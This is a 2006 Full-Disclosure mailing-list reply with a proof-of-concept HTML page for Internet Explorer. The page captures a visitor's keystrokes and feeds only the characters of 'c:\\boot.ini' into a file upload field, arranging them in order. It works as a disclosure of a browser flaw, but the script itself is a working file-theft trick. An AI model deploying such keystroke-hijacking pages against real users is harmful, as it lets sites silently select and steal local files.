Re: [Full-disclosure] file upload widgets in IE and Firefox have issues
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] file upload widgets in IE and Firefox have issues
- From: Bart van Arnhem <obliv@xxxxxxx>
- Date: Thu, 08 Jun 2006 18:29:21 +0200
Here is another proof of concept, for IE only. It allows the characters
to be entered in an arbitrary order, since it repositions the caret to
make each character drop into the right place.
Just open this HTML in IE and bash on the keyboard a bit.
- Bart
<html>
<head>
<script type="text/javascript">
// Demonstration script: filters the visitor's keystrokes so that only the
// characters of targetFile reach the file input, and moves the caret so each
// one lands at its position in that string. The script only fills the field;
// it never calls submit on the form.
// NOTE(review): the technique depends on the file control accepting typed
// characters at all; a control whose path can only be set through the chooser
// dialog could not be filled this way.
var targetFile = "c:\\boot.ini";
// All handlers are attached after load, when the "target" element exists.
window.onload = function ()
{
// tempFilled, tempDone, origPos and tempPos are assigned without var, so they
// become implicit globals shared by the handlers below.
// tempFilled: one "\x01" placeholder per character of targetFile; placeholders
// are overwritten as the matching characters are typed.
tempFilled = new Array(targetFile.length + 1).join("\x01");
// tempDone: upper-cased copy of targetFile; characters already consumed are
// overwritten with "\x01" so they cannot match a second time.
tempDone = targetFile.toUpperCase();
// Drop focus from the file input after every key release.
document.getElementById("target").onkeyup = function ()
{ this.blur(); };
// Keystroke filter: returns true to let a key through, false to cancel it.
document.getElementById("target").onkeypress = function (e)
{
// Fall back to the global event object when no argument is passed.
if (!e) e = window.event;
// Treats e.keyCode as a character code and upper-cases it, so matching
// against tempDone is case-insensitive.
var pressed =
String.fromCharCode(e.keyCode).toUpperCase();
// Accept the key only if that character is still outstanding.
if ((origPos = tempDone.indexOf(pressed)) !== -1)
{
// Record the character at its final position in the assembled string.
tempFilled = tempFilled.substr(0, origPos) +
pressed + tempFilled.substr(origPos + 1);
// String.replace with a string pattern replaces only the first occurrence,
// i.e. the one indexOf just found.
tempDone = tempDone.replace(pressed, "\x01");
// Count the placeholders still left of origPos (positions not yet typed).
var matches = tempFilled.substr(0,
origPos).match(/\x01/g);
// Caret offset = final position minus the gaps before it; presumably the
// offset within the text already present in the field.
tempPos = origPos - (matches == null ? 0 :
matches.length);
// Move the caret: collapse the input's text range to its start, step
// tempPos characters forward and select the empty range.
var range =
document.getElementById("target").createTextRange();
range.collapse(true);
range.move("character", tempPos);
range.select();
return true;
}
// Any other key is cancelled and never reaches the field.
return false;
}
// Any key pressed anywhere in the document moves focus to the file input.
document.onkeydown = function () {
document.getElementById("target").focus() };
}
</script>
</head>
<body>
<form method="post" action="">
<input type="file" id="target" />
</form>
</body>
</html>